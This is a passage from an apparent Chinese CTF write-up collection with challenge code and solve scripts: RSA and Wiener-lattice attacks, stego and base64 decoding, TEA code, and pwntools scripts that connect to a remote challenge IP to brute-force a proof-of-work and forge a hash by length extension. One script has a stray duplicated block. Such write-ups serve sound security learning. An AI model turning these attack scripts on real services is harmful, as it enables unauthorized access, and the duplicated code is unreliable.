1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2,
7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8,
2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11]
# S盒 512 Bytes
S = [S1, S2, S3, S4, S5, S6, S7, S8]
# 用于对数据进行扩展置换,将32bit数据扩展为48bit
extend_table = [32, 1, 2, 3, 4, 5,
4, 5, 6, 7, 8, 9,
8, 9, 10, 11, 12, 13,
12, 13, 14, 15, 16, 17,
16, 17, 18, 19, 20, 21,
20, 21, 22, 23, 24, 25,
24, 25, 26, 27, 28, 29,
28, 29, 30, 31, 32, 1]
# P盒 32 Bytes
P_table = [16, 7, 20, 21, 29, 12, 28, 17,
1, 15, 23, 26, 5, 18, 31, 10,
2, 8, 24, 14, 32, 27, 3, 9,
19, 13, 30, 6, 22, 11, 4, 25]
def int2bit(n):  # 0~15整数转比特
a = []
for i in range(0, 4):
a.insert(0, str(n % 2))
n = int(n / 2)
return a
# IP置换部分,op为0表示正置换,op为1表示逆置换
def IP(text, op):
tmp = [0 for i in range(64)]
if op == 0:
for i in range(64):
tmp[i] = text[IP_table[i] - 1]
return tmp
if op == 1:
for i in range(64):
tmp[i] = text[Inv_IP_table[i] - 1]
return tmp
# 进行扩展,将32位扩展为48位
def Extend(text):
extend = [0 for i in range(48)]
for i in range(48):
extend[i] = text[extend_table[i] - 1]
return extend
# S盒变换部分
def S_replace(text):
Sresult = [0 for k in range(32)]
for k in range(8):
row = 2 * int(text[k * 6]) + int(text[k * 6 + 5])
column = 8 * int(text[k * 6 + 1]) + 4 * int(text[k * 6 + 2]) + 2 * int(text[k * 6 + 3]) + int(text[k * 6 + 4])
tmp = S[k][row * 16 + column]
for i in range(4):
Sresult[4 * k + i] = int2bit(tmp)[i]
return Sresult
# P置换部分
def P_replace(text):
Presult = [0 for i in range(32)]
for i in range(32):
Presult[i] = text[P_table[i] - 1]
return Presult
# 异或运算
def Xor(bit1, bit2):
Xorresult = [0 for i in range(len(bit1))]
for i in range(len(bit1)):
Xorresult[i] = str(int(bit1[i]) ^ int(bit2[i]))
return Xorresult

two old man

#***Task
from Crypto.Util.number import getPrime, bytes_to_long
from gmpy2 import next_prime
from os import urandom
p = getPrime(512)
q = next_prime(p)
f = open('flag.txt', 'rb')
flag = bytes_to_long(f.read() + urandom(80))
f.close()
n = p * q
noise = 1
for i in range(1, p):
noise = (noise * i) % n
e = 65537
m = noise * flag % n
c = pow(m, e, n)
f = open('cipher.txt', 'w')
f.write(f'n = {n}\n')
f.write(f'c = {c}\n')
f.close()
# n = 85300075344029411815824595503988243445862905766678219075505308650733618833670564881852727486124268400610986787128098448019033364495139613324970241727110931819892696714818851281415775513570277910383275087114654129682377412912019832281317957560043184535419626656895668221654944747681971549122289940681069900407
# c = 9573652589542765552302771253681350397003834739308979745013100413124314842798363931809688570564520116621700487372591176287735200842509675988724251662626729985842786542792501720096155870937426730816107184806453412679852267311433564241907769415712680798333238722253896962273334726781549003053182286964079196169
#***Solution
# -*- coding: utf-8 -*-
from Crypto.Util.number import long_to_bytes, isPrime
from gmpy2 import invert, powmod
from libnum import solve_crt
from functools import reduce
n = 85300075344029411815824595503988243445862905766678219075505308650733618833670564881852727486124268400610986787128098448019033364495139613324970241727110931819892696714818851281415775513570277910383275087114654129682377412912019832281317957560043184535419626656895668221654944747681971549122289940681069900407
c = 9573652589542765552302771253681350397003834739308979745013100413124314842798363931809688570564520116621700487372591176287735200842509675988724251662626729985842786542792501720096155870937426730816107184806453412679852267311433564241907769415712680798333238722253896962273334726781549003053182286964079196169
e = 65537
p = 9235803990126112015712488678718763955409551939176855113164196792808741000738495903574101715848666926223811357608313697206174389466866723210464201625526487
q = 9235803990126112015712488678718763955409551939176855113164196792808741000738495903574101715848666926223811357608313697206174389466866723210464201625528161
d = invert(e, (p-1)*(q-1))
assert p*q == n
m = pow(c, d, n)
d1 = invert(p-1, p)
print(f'd1 = {d1}')
m1 = m * d1 % p
print(f'm1 = {m1}')
s = reduce(lambda x,y: x * y % n, range(p, q), 1)
d2 = invert(s, q)
s = d2 * (q - 1) % q
d2 = invert(s, q)
print(f'd2 = {d2}')
m2 = m * d2 % q
print(f'm2 = {m2}')
m = solve_crt((m1, m2), (p, q))
print(long_to_bytes(m)[:-80])
b'flag{c7cfdbc1-729b-de11-239f-a473ec0637b8}'

tupian

open Stegsolve  open gif imge
Analyse->frame browser
convert new_gif.gif -coalesce xx_%05d.png
Y2F0Y2hfdGhlX2R5bmFtaWNfZmxhZ19pc19xdW10ZV9zaW1wbGU=
base64_text -d Y2F0Y2hfdGhlX2R5bmFtaWNfZmxhZ19pc19xdW10ZV9zaW1wbGU=
catch_the_dynamic_flag_is_qumte_simple

Train

task.py

from Crypto.Util.number import*
from hashlib import sha256
import socketserver
import signal
import string
import random
from secret import flag
banner = br'''
.oooooo..o                             oooo  oooo  ooooooooooooo                     o8o
d8P'    `Y8                             `888  `888  8'   888   `8                     `"'
Y88bo.      ooo. .oo.  .oo.    .oooo.    888   888       888      oooo d8b  .oooo.   oooo  ooo. .oo.
`"Y8888o.  `888P"Y88bP"Y88b  `P  )88b   888   888       888      `888""8P `P  )88b  `888  `888P"Y88b
`"Y88b  888   888   888   .oP"888   888   888       888       888      .oP"888   888   888   888
oo     .d8P  888   888   888  d8(  888   888   888       888       888     d8(  888   888   888   888
8""88888P'  o888o o888o o888o `Y888""8o o888o o888o     o888o     d888b    `Y888""8o o888o o888o o888o
'''
n0 = 30798082519452208630254982405300548841337042015746308462162479889627080155514391987610153873334549377764946092629701
g = 64146569863628228208271069055817252751116365290967978172021890038925428672043
def TrainHash(msg):
n = n0
msg = map(ord,msg)
for i in msg :
n = g * (n+i)
n = n & (1<<383)
return n - 0xf5e33dabb114514
table = string.ascii_letters+string.digits
MENU = br'''
<OPTION>
'''
class Task(socketserver.BaseRequestHandler):
def _recvall(self):
BUFF_SIZE = 2048
data = b''
while True:
part = self.request.recv(BUFF_SIZE)
data += part
if len(part) < BUFF_SIZE:
break
return data.strip()
def send(self, msg, newline=True):
try:
if newline:
msg += b'\n'
self.request.sendall(msg)
except:
pass
def recv(self, prompt=b'SERVER <INPUT>: '):
self.send(prompt, newline=False)
return self._recvall()
def proof_of_work(self):
proof = (''.join([random.choice(table)for _ in range(20)])).encode()
sha = sha256(proof).hexdigest().encode()
self.send(b"[+] sha256(XXXX+" + proof[4:] + b") == " + sha )
XXXX = self.recv(prompt = b'[+] Plz Tell Me XXXX :')
if len(XXXX) != 4 or sha256(XXXX + proof[4:]).hexdigest().encode() != sha:
return False
return sha.decode()
def handle(self):
signal.alarm(30)
FirstBlockHash = self.proof_of_work()
if not FirstBlockHash:
self.request.close()
self.send(banner)
self.send(b"\nPlease give me 2 strings that are same when are hashed  =.=  ")
string1 = self.recv().decode()
string2 = self.recv().decode()
if TrainHash(string1) == TrainHash(string2):
self.send(b'\nJust do it!~ You can do more!')
if string2.encode()[-50:] == string1.encode()[-50:]:
self.send(flag)
self.send(b"\nConnection has been closed  =.=  ")
self.request.close()
class ThreadedServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
class ForkedServer(socketserver.ForkingMixIn, socketserver.TCPServer):
pass
if __name__ == "__main__":
HOST, PORT = '0.0.0.0', 10012
print("HOST:POST " + HOST+":" + str(PORT))
server = ForkedServer((HOST, PORT), Task)
server.allow_reuse_address = True
server.serve_forever()

exp.py

from pwn import *
import string
import hashlib
table = string.ascii_letters + string.digits
re = remote('39.106.48.123',29929)
re.recvuntil(b'[+] sha256(XXXX+')
x = re.recv(16)
re.recvuntil(b') == ')
y = re.recv(64)
flag = 0
for a in table:
if flag:break
for b in table:
if flag: break
for c in table:
if flag: break
for d in table:
z = (a + b + c + d).encode()
if hashlib.sha256(z + x).hexdigest() == y.decode():
flag = 1
re.recv()
re.sendline(z)
break
re.recvuntil(b'SERVER <INPUT>: ')
re.sendline(b'a')
re.recvuntil(b'SERVER <INPUT>: ')
re.sendline(b'a')
re.interactive()
if hashlib.sha256(z + x).hexdigest() == y.decode():
flag = 1
re.recv()
re.sendline(z)
re.recvuntil(b'SERVER <INPUT>: ')
re.sendline(b'a')
re.recvuntil(b'SERVER <INPUT>: ')
re.sendline(b'a')
re.interactive()

TrainPlus

exp.py

'''
给出了一个16字节随机生成的一个字符串,已知量。并且使用自己的MD00PLUS去对sec进行一次哈希,
发现需要给出一个消息 以及sec+这个消息 能够让我们预测到这块的哈希是多少
首先我们得看一下MD00Plus这个函数,我们发现他其实跟正常的MD5不一样,而改变的地方就是一开始的padding部分
那么其实如果了解哈希长度攻击的很快就能发现只要给出这样的就可以成功。
'''
def Md00Plus(message: bytes):
h0 = 0x114514ab
h1 = 0x1919810a
h2 = 0xa0189191
h3 = 0xba415411
R = (7, 12, 17, 22) * 4 + (5, 9, 14, 20) * 4 + (4, 11, 16, 23) * 4 + (6, 10, 15, 21) * 4
K = (0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee,
0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501, 0x698098d8,
0x8b44f7af, 0xffff5bb1, 0x895cd7be, 0x6b901122, 0xfd987193,
0xa679438e, 0x49b40821, 0xf61e2562, 0xc040b340, 0x265e5a51,
0xe9b6c7aa, 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8,
0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed, 0xa9e3e905,
0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a, 0xfffa3942, 0x8771f681,
0x6d9d6122, 0xfde5380c, 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60,
0xbebfbc70, 0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05,
0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665, 0xf4292244,
0x432aff97, 0xab9423a7, 0xfc93a039, 0x655b59c3, 0x8f0ccc92,
0xffeff47d, 0x85845dd1, 0x6fa87e4f, 0xfe2ce6e0, 0xa3014314,
0x4e0811a1, 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391)
F = lambda x, y, z: ((x & y) | ((~x) & z))
G = lambda x, y, z: ((x & z) | (y & (~z)))
H = lambda x, y, z: (x ^ y ^ z)
I = lambda x, y, z: (y ^ (x | (~z)))
L = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xffffffff
W = lambda i4, i3, i2, i1: (i1 << 24) | (i2 << 16) | (i3 << 8) | i4
reverse = lambda x: (x << 24) & 0xff000000 | (x << 8) & 0x00ff0000 | \
(x >> 8) & 0x0000ff00 | (x >> 24) & 0x000000ff
ascii_list = list(map(lambda x: x, message))
msg_length = len(ascii_list) * 8
ascii_list.append(128)
while (len(ascii_list) * 8 + 64) % 512 != 0:
ascii_list.append(1)
for i in range(8):
ascii_list.append((msg_length >> (8 * i)) & 0xff)
for i in range(len(ascii_list) // 64):
a, b, c, d = h0, h1, h2, h3
for j in range(64):
if 0 <= j <= 15:
f = F(b, c, d) & 0xffffffff
g = j
elif 16 <= j <= 31:
f = G(b, c, d) & 0xffffffff
g = ((5 * j) + 1) % 16
elif 32 <= j <= 47:
f = H(b, c, d) & 0xffffffff
g = ((3 * j) + 5) % 16
else:
f = I(b, c, d) & 0xffffffff
g = (7 * j) % 16
aa, dd, cc = d, c, b
s = i * 64 + g * 4
w = W(ascii_list[s], ascii_list[s + 1], ascii_list[s + 2], ascii_list[s + 3])
bb = (L((a + f + K[j] + w) & 0xffffffff, R[j]) + b) & 0xffffffff
a, b, c, d = aa, bb, cc, dd
h0 = (h0 + a) & 0xffffffff
h1 = (h1 + b) & 0xffffffff
h2 = (h2 + c) & 0xffffffff
h3 = (h3 + d) & 0xffffffff
h0, h1, h2, h3 = reverse(h0), reverse(h1), reverse(h2), reverse(h3)
digest = (h0 << 96) | (h1 << 64) | (h2 << 32) | h3
return hex(digest)[2:].rjust(32, '0'),ascii_list
def md5ex(hash,message: bytes):
reverse = lambda x: (x << 24) & 0xff000000 | (x << 8) & 0x00ff0000 | \
(x >> 8) & 0x0000ff00 | (x >> 24) & 0x000000ff
hash = int(hash,16)
h3 = reverse(hash&0xffffffff)
hash >>= 32
h2 = reverse(hash&0xffffffff)
hash >>= 32
h1 = reverse(hash&0xffffffff)
hash >>= 32
h0 = reverse(hash&0xffffffff)
R = (7, 12, 17, 22) * 4 + (5, 9, 14, 20) * 4 + (4, 11, 16, 23) * 4 + (6, 10, 15, 21) * 4
K = (0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee,
0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501, 0x698098d8,
0x8b44f7af, 0xffff5bb1, 0x895cd7be, 0x6b901122, 0xfd987193,
0xa679438e, 0x49b40821, 0xf61e2562, 0xc040b340, 0x265e5a51,
0xe9b6c7aa, 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8,
0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed, 0xa9e3e905,
0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a, 0xfffa3942, 0x8771f681,
0x6d9d6122, 0xfde5380c, 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60,
0xbebfbc70, 0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05,
0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665, 0xf4292244,
0x432aff97, 0xab9423a7, 0xfc93a039, 0x655b59c3, 0x8f0ccc92,
0xffeff47d, 0x85845dd1, 0x6fa87e4f, 0xfe2ce6e0, 0xa3014314,
0x4e0811a1, 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391)
F = lambda x, y, z: ((x & y) | ((~x) & z))
G = lambda x, y, z: ((x & z) | (y & (~z)))
H = lambda x, y, z: (x ^ y ^ z)
I = lambda x, y, z: (y ^ (x | (~z)))
L = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xffffffff
W = lambda i4, i3, i2, i1: (i1 << 24) | (i2 << 16) | (i3 << 8) | i4
ascii_list = list(map(lambda x: x, message))
msg_length = len(ascii_list) * 8 + 512
ascii_list.append(128)
while (len(ascii_list) * 8 + 64) % 512 != 0:
ascii_list.append(1)
for i in range(8):
ascii_list.append((msg_length >> (8 * i)) & 0xff)
for i in range(len(ascii_list) // 64):
a, b, c, d = h0, h1, h2, h3
for j in range(64):
if 0 <= j <= 15:
f = F(b, c, d) & 0xffffffff
g = j
elif 16 <= j <= 31:
f = G(b, c, d) & 0xffffffff
g = ((5 * j) + 1) % 16
elif 32 <= j <= 47:
f = H(b, c, d) & 0xffffffff
g = ((3 * j) + 5) % 16
else:
f = I(b, c, d) & 0xffffffff
g = (7 * j) % 16
aa, dd, cc = d, c, b
s = i * 64 + g * 4
w = W(ascii_list[s], ascii_list[s + 1], ascii_list[s + 2], ascii_list[s + 3])
bb = (L((a + f + K[j] + w) & 0xffffffff, R[j]) + b) & 0xffffffff
a, b, c, d = aa, bb, cc, dd
h0 = (h0 + a) & 0xffffffff
h1 = (h1 + b) & 0xffffffff
h2 = (h2 + c) & 0xffffffff
h3 = (h3 + d) & 0xffffffff
h0, h1, h2, h3 = reverse(h0), reverse(h1), reverse(h2), reverse(h3)
digest = (h0 << 96) | (h1 << 64) | (h2 << 32) | h3
return hex(digest)[2:].rjust(32, '0'),ascii_list
from pwn import*
import string
from pwnlib.util.iters import mbruteforce
from hashlib import*
table = string.ascii_letters+string.digits
io = remote("39.106.48.123",39628)
def pow1():
io.recvuntil(b'XXXX+')
suffix = io.recv(16).decode("utf8")
io.recvuntil(b'== ')
cipher = io.recvline().strip().decode("utf8")
proof = mbruteforce(lambda x: sha256((x + suffix).encode()).hexdigest() ==
cipher, table, length=4, method='fixed')
io.sendlineafter(b'XXXX :', proof.encode())
return cipher
pow1()
io.recvuntil(b'Thing:')
GreatThing = io.recv(16)
from Crypto.Util.number import*
io.recvuntil(b'REATTHING:')
Md00 = io.recv(32)
H = md5ex(Md00.decode(),GreatThing)[0].encode()
for i in range(1,26):
Pad = Md00Plus(i*b'a')[1][i:]
MSG = bytes(Pad) + GreatThing
s = hex(bytes_to_long(MSG))[2:].encode()+b','+ hex(bytes_to_long(H))[2:].encode()
io.sendline(s)
print(i,io.recv())
msg = io.recv()
if b'flag' in msg:
print(msg)
break
io.interactive()

tea_签到题

/******************************************
Use: "Hello World!".encrypt("key")
=> "íSjÝqTÂWÕã”Aa[UÄ"
******************************************/
String.prototype.encrypt = function(password) {
const v = new Array(2);
const k = new Array(4);
let s = "";
var i;
plaintext = escape(this); // use escape() so only have single-byte chars to encode
// build key directly from 1st 16 chars of password
for (var i = 0; i < 4; i++) k[i] = Str4ToLong(password.slice(i * 4, (i + 1) * 4));
for (i = 0; i < plaintext.length; i += 8) { // encode plaintext into s in 64-bit (8 char) blocks
v[0] = Str4ToLong(plaintext.slice(i, i + 4)); // ... note this is 'electronic codebook' mode
v[1] = Str4ToLong(plaintext.slice(i + 4, i + 8));
code(v, k);
s += LongToStr4(v[0]) + LongToStr4(v[1]);
}
return escCtrlCh(s);
// note: if plaintext or password are passed as string objects, rather than strings, this
// function will throw an 'Object doesn't support this property or method' error
}
// Like C code
function code(v, k) {
// Extended TEA: this is the 1997 revised version of Needham & Wheeler's algorithm
// params: v[2] 64-bit value block; k[4] 128-bit key
let y = v[0];
let z = v[1];
const delta = 0x9E3779B9;
const limit = delta * 32;
let sum = 0;
while (sum != limit) {
y += (z << 4 ^ z >>> 5) + z ^ sum + k[sum & 3];
sum += delta;
z += (y << 4 ^ y >>> 5) + y ^ sum + k[sum >>> 11 & 3];
// note: unsigned right-shift '>>>' is used in place of original '>>', due to lack
// of 'unsigned' type declaration in JavaScript (thanks to Karsten Kraus for this)
}
v[0] = y;
v[1] = z;
}
// supporting functions
function Str4ToLong(s) { // convert 4 chars of s to a numeric long
let v = 0;
for (let i = 0; i < 4; i++) v |= s.charCodeAt(i) << i * 8;
return isNaN(v) ? 0 : v;
}
function LongToStr4(v) { // convert a numeric long to 4 char string
const s = String.fromCharCode(v & 0xFF, v >> 8 & 0xFF, v >> 16 & 0xFF, v >> 24 & 0xFF);
return s;
}
function escCtrlCh(str) { // escape control chars which might cause problems with encrypted texts
return str.replace(/[\0\t\n\v\f\r\xa0'"!]/g, c => `!${c.charCodeAt(0)}!`);
}
function unescCtrlCh(str) { // unescape potentially problematic nulls and control characters
return str.replace(/!\d\d?\d?!/g, c => String.fromCharCode(c.slice(1, -1)));
}
// module.exports = (text, password) => text.encrypt(password);
/******************************************
Use: "íSjÝqTÂWÕã”Aa[UÄ".decrypt("key")
=> "Hello World!"
******************************************/
String.prototype.decrypt = function(password) {
const v = new Array(2);
const k = new Array(4);
let s = "";
var i;
for (var i = 0; i < 4; i++) k[i] = Str4ToLong(password.slice(i * 4, (i + 1) * 4));
ciphertext = unescCtrlCh(this);
for (i = 0; i < ciphertext.length; i += 8) { // decode ciphertext into s in 64-bit (8 char) blocks
v[0] = Str4ToLong(ciphertext.slice(i, i + 4));
v[1] = Str4ToLong(ciphertext.slice(i + 4, i + 8));
decode(v, k);
s += LongToStr4(v[0]) + LongToStr4(v[1]);
}
// strip trailing null chars resulting from filling 4-char blocks:
s = s.replace(/\0+$/, '');
return unescape(s);
};
// Like C code
function decode(v, k) {
let y = v[0];
let z = v[1];
const delta = 0x9E3779B9;
let sum = delta * 32;
while (sum != 0) {
z -= (y << 4 ^ y >>> 5) + y ^ sum + k[sum >>> 11 & 3];
sum -= delta;
y -= (z << 4 ^ z >>> 5) + z ^ sum + k[sum & 3];
}
v[0] = y;
v[1] = z;
}
// supporting functions
function Str4ToLong(s) { // convert 4 chars of s to a numeric long
let v = 0;
for (let i = 0; i < 4; i++) v |= s.charCodeAt(i) << i * 8;
return isNaN(v) ? 0 : v;
}
function LongToStr4(v) { // convert a numeric long to 4 char string
const s = String.fromCharCode(v & 0xFF, v >> 8 & 0xFF, v >> 16 & 0xFF, v >> 24 & 0xFF);
return s;
}
function escCtrlCh(str) { // escape control chars which might cause problems with encrypted texts
return str.replace(/[\0\t\n\v\f\r\xa0'"!]/g, c => `!${c.charCodeAt(0)}!`);
}
function unescCtrlCh(str) { // unescape potentially problematic nulls and control characters
return str.replace(/!\d\d?\d?!/g, c => String.fromCharCode(c.slice(1, -1)));
}
// module.exports = (text, password) => text.decrypt(password);
let text = "flag{demo}"
let entext = text.encrypt("123321")
let detext = entext.decrypt("123321")
console.log(detext);

simple

#**Task
# task.py
from Crypto.Util.number import *
import gmpy2
import random
def get_extend():
while True:
d = random.randint(2**680,2**730)
if isPrime(d):
e = gmpy2.invert(d,lcm)
return e
#731
flag = b"flag{xxxxxxxxxxx}"
m = bytes_to_long(flag)
e = 65537
p = getPrime(1024)
q = getPrime(1024)
lcm = gmpy2.lcm(p-1,q-1)
n = p*q
c = pow(m,e,n)
e1 = get_extend()
e2 = get_extend()
print("e1 =",e1)
print("e2 =",e2)
print("c =",c)
print("n =",n)
#e1 = 1038188773022222237625162518466985515806685046439847462572843423800303080199415368325579099819361640945202226526678764311585592296933622966635366454130900252466567292666094830865094694540899938932650663694321540899409821558619513870070621174837528024755540950294728078653453000484865860920060355130142874882872471337494879275434166435493265146752291857135290428750750609423353579700984426964475724965353873095813181244686536072523222027403912142730610262067287620007571352094447066062529895627497159337248165671672168914514241613626520037706745398642583257608070477729851466078618962204332539106519787878047712382699
#e2 = 2837849440271663829778449470456059993823700375016504578318494102782617180188657051885856137280051100635878402423110369686929227684421486015532180997159960436120141492683886715611434986294622600612428406093623932339780091710632795226634412256078611259843109876301975664056868908063144172636320692414857287719870275516722663234436495523740203192523105607062687910252368627072074836944313105637959564954309098651598325997792496430340003856687190484681832529188281328826421428597879086043647647886763379182416419551074016810300511817626177321217978912504879476086100668005286481779806010131350674761039391612993646202901
#c = 5973798238952580291825915383143493132916118834759984908567429997405141389115327100612059752092101975323145558282778289524466024564450720131251849100687215493221989801105144437981685382023973692198113306045957788268110316519461230170693204752380105917975206409994893101671098451678847638671373239757408532363808224681853024689663345258120864348816343897379881239786554998688501997609152329902187048422237325117741778968505252184157273467466011959504548459297647302026380076579903441434135973514451254950835559924204821846949520738057940287763572642367638668413987340659205489659594044022422368411980101640782079189025
#n = 26901814699902439156457451193693740730489294959491270367027927283506475930489639407729426818974347303153364758700002407059993182986763909124690390655890031474097185414651218374672254140022392199647526025638012909369532528422355530044873378287920255523382224453173638818751280227521077881224963029942704252587893395262633450759457753054490886171089835324182422639138198164026845488515879253564971977801724349440235209377091735281830263780308625603392942624306475075157394231585266792247387837984357822842056801420064918953837917678662504712605611080802179768683537742095990507008809197788025847612652983474906829809607
#***Solution
# exp.sage
from sage.all import *
from Crypto.Util.number import *
from Crypto.Cipher import DES
import gmpy2
from Crypto.Util.number import *
from gmpy2 import invert
# USE extending wiener attack
e1 = 1038188773022222237625162518466985515806685046439847462572843423800303080199415368325579099819361640945202226526678764311585592296933622966635366454130900252466567292666094830865094694540899938932650663694321540899409821558619513870070621174837528024755540950294728078653453000484865860920060355130142874882872471337494879275434166435493265146752291857135290428750750609423353579700984426964475724965353873095813181244686536072523222027403912142730610262067287620007571352094447066062529895627497159337248165671672168914514241613626520037706745398642583257608070477729851466078618962204332539106519787878047712382699
e2 = 2837849440271663829778449470456059993823700375016504578318494102782617180188657051885856137280051100635878402423110369686929227684421486015532180997159960436120141492683886715611434986294622600612428406093623932339780091710632795226634412256078611259843109876301975664056868908063144172636320692414857287719870275516722663234436495523740203192523105607062687910252368627072074836944313105637959564954309098651598325997792496430340003856687190484681832529188281328826421428597879086043647647886763379182416419551074016810300511817626177321217978912504879476086100668005286481779806010131350674761039391612993646202901
c = 5973798238952580291825915383143493132916118834759984908567429997405141389115327100612059752092101975323145558282778289524466024564450720131251849100687215493221989801105144437981685382023973692198113306045957788268110316519461230170693204752380105917975206409994893101671098451678847638671373239757408532363808224681853024689663345258120864348816343897379881239786554998688501997609152329902187048422237325117741778968505252184157273467466011959504548459297647302026380076579903441434135973514451254950835559924204821846949520738057940287763572642367638668413987340659205489659594044022422368411980101640782079189025
N = 26901814699902439156457451193693740730489294959491270367027927283506475930489639407729426818974347303153364758700002407059993182986763909124690390655890031474097185414651218374672254140022392199647526025638012909369532528422355530044873378287920255523382224453173638818751280227521077881224963029942704252587893395262633450759457753054490886171089835324182422639138198164026845488515879253564971977801724349440235209377091735281830263780308625603392942624306475075157394231585266792247387837984357822842056801420064918953837917678662504712605611080802179768683537742095990507008809197788025847612652983474906829809607
a = 0.356  # 731./2049
M1 = N ** 0.5
M2 = N ** (a + 1)
D = diagonal_matrix(ZZ, [N, M1, M2, 1])
M = matrix(ZZ, [[1, -N, 0, N ** 2], [0, e1, -e1, -e1 * N], [0, 0, e2, -e2 * N], [0, 0, 0, e1 * e2]]) * D
L = M.LLL()
t = vector(ZZ, L[0])
x = t * M ** (-1)
phi = int(x[1] / x[0] * e1)
d = invert(0x10001, phi)
m = pow(c, d, N)
print(long_to_bytes(m))
'''
pip install pycryptodome
pip install gmpy2
sage --pip install gmpy2
sage exp.sage
'''
# b'flag{d30488dc-ed10-4f09-aebb-5c049436d250}'

#***Task.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import random
from Crypto.Util.number import bytes_to_long
# from secret import FLAG
FLAG = b"flag{123}"
assert FLAG.startswith(b'flag{') and FLAG.endswith(b'}')
q = 210767327475911131359308665806489575328083
flag_bin = bin(bytes_to_long(FLAG[5:-1]))[2:]
l = len(flag_bin) #len("1100010011001000110011")
print(l)
print(bin(bytes_to_long(FLAG[5:-1]))) #0b1100010011001000110011
n = random.randint(l, 2*l)  #randint(22, 22*2)
print(n) #24
cipher = []
for _ in range(n): #range(0,24,1)
r = [random.randint(2, q-2) for _ in range(l)]#range(22)  randint(2, 210767327475911131359308665806489575328081)
# print(r)
s = 1
for i in range(l):#range(22)
s = s * r[i] ** int(flag_bin[i]) % q
cipher.append([r, s])
with open('new_output.txt', 'w') as f:
f.write(str(cipher))
#exp.py
from Crypto.Util.number import *
from sage.all import *
def add(a,p):
if pow(a,(p-1)//2,p)==1:
return 1
else:
return 0
f=open('output.txt','rb')
q = 210767327475911131359308665806489575328083
out=eval(f.read())
A=Matrix(GF(2),len(out))
v=vector(GF(2),len(out))
for i in range(len(out)):
t1,t2=out[i]
for j in range(len(t1)):
A[i,j]=add(t1[j],q)
v[i]=add(t2,q)+1
m=A.solve_right(v)
m=''.join(map(str,m))
print(long_to_bytes(int(m,2)))

NONO

import base64
import re
# 填出来的数织答案
v27 ="0000000000000000000000000000000010000000000000000001110000000000000000111110000000000000111111110000000000011111111100000000001111111111100000000000111111100000000000000000000000000111111111111110000011100000000011110000111000000000111111100111111111111111000000000000000000000000000000111111100000000000001111111000000000000111111110000000000001111111000000000000000000000000000000000000000000000000"
# 得到flag:flag{UDnkDgD2HEPlFEXlF8uyHPBHFEEnD8NTDPr3j85THDP+jKD=}
##
# 按照0或1的连续⻓度进⾏压缩
tmpl = re.findall(r'0+|1+', v27)
v24 = bytes([len(x) for x in tmpl])
# 拿到base64的新表
unk_403040 = [0x0C, 0xFF, 0xFF, 0xFF, 0x22, 0x2C, 0x25, 0x05, 0x1E, 0x1F, 0x34, 0x1D,
0x39, 0x30, 0x15, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x2B, 0x14, 0x2D, 0x00,
0x10, 0x02, 0x11, 0x03, 0x37, 0x29, 0x33, 0x3B, 0x2E, 0x24, 0x2F, 0x20, 0x0A, 0x3D,
0x3F, 0x07, 0x08, 0x17, 0x0D, 0x28, 0x27, 0x26, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0x35, 0x2A, 0x3A, 0x13, 0x18, 0x3E, 0x31, 0x38, 0x21, 0x01, 0x12, 0x0B, 0x32, 0x04,
0x06, 0x19, 0x09, 0x3C, 0x1B, 0x0E, 0x1C, 0x36, 0x0F, 0x16, 0x1A, 0x23]
mytable = [0 for _ in range(64)]
for x in unk_403040:
if x != 0xFF:
mytable[x] = chr(unk_403040.index(x)+43)
mytable = ''.join(mytable)
# 换表encode
b64table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
s = base64.b64encode(v24)
flag = "flag{" + s.decode().translate(str.maketrans(b64table, mytable)) + "}"
print(flag)

kaokaoni

a = [[8, 2, 22, 97, 38, 15, 0, 40, 0, 75, 4, 5, 7, 78, 52, 12, 50, 77, 91, 8],
[49, 49, 99, 40, 17, 81, 18, 57, 60, 87, 17, 40, 98, 43, 69, 48, 4, 56, 62, 0],
[81, 49, 31, 73, 55, 79, 14, 29, 93, 71, 40, 67, 53, 88, 30, 3, 49, 13, 36, 65],
[52, 70, 95, 23, 4, 60, 11, 42, 69, 24, 68, 56, 1, 32, 56, 71, 37, 2, 36, 91],
[22, 31, 16, 71, 51, 67, 63, 89, 41, 92, 36, 54, 22, 40, 40, 28, 66, 33, 13, 80],
[24, 47, 32, 60, 99, 3, 45, 2, 44, 75, 33, 53, 78, 36, 84, 20, 35, 17, 12, 50],
[32, 98, 81, 28, 64, 23, 67, 10, 26, 38, 40, 67, 59, 54, 70, 66, 18, 38, 64, 70],
[67, 26, 20, 68, 2, 62, 12, 20, 95, 63, 94, 39, 63, 8, 40, 91, 66, 49, 94, 21],
[24, 55, 58, 5, 66, 73, 99, 26, 97, 17, 78, 78, 96, 83, 14, 88, 34, 89, 63, 72],
[21, 36, 23, 9, 75, 0, 76, 44, 20, 45, 35, 14, 0, 61, 33, 97, 34, 31, 33, 95],
